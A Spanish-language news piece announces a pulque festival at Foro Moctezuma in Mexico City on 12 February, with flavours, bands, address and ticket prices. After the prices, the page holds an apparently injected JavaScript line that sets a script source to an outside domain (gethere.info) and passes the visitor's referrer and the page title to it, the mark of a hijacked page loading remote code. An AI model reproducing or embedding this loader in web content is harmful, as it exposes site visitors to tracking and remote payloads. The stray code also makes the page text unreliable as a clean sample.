Amor, Amistad y Pulque en la Fiesta del Pulque

Sabores como Velo de novia, vino tinto y crema de avellana podrán ser disfrutados en esta edición.

Pulque

La Fiesta del Pulque, que se llevará a cabo el domingo 12 de Febrero en el Foro Moctezuma con la idea de promover la producción de esta bebida milenaria.

Los asistentes a esta Fiesta del Pulque podrán degustar desde los clásicos curados de jitomate, apio, avena, piñón y fresas, hasta ediciones especiales como velo de novia, vino tinto y crema de avellana, ingredientes que son la combinación perfecta en el Día del Amor y la Amistad.

La cita para probar “El elixir de los Dioses”es este 12 de Febrero, el Colectivo S22 reunirá a los mejores productores, pulqueros y tlachiqueros, quienes promoverán la cultura de esta bebida, ya que el objetivo de esta Fiesta del Pulque es apoya a las grandes y pequeñas empresas que se dedican a la producción, venta y distribución del pulque.

Esta bebida forma parte de la historia y la cultura mexicana, y es el resultado del trabajo de campesinos, tlachiqueros y pulqueros, es decir, el pretexto perfecto para llevar a tus amigos o pareja a degustar de esta bebida nacional.

Para hacer de este día una gran celebración, en la Fiesta del Pulque participarán diferentes bandas emergentes que darán a conocer sus propuestas musicales y abrirán el escenario a Royal Club y El Parto de la Chole.

La Fiesta del Pulque se llevará a cabo el 12 de Febrero, de 11:00 a 19:00 horas, en el Foro Moctezuma, ubicado en Emilio Carranza No. 22, colonia Moctezuma 1ra Sección, delegación Venustiano Carranza, cerca del metro Moctezuma, en la Ciudad de México.

 

El acceso tendrá un costo de 20 pesos en preventa y 60 pesos VIP (incluye vaso conmemorativo).

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios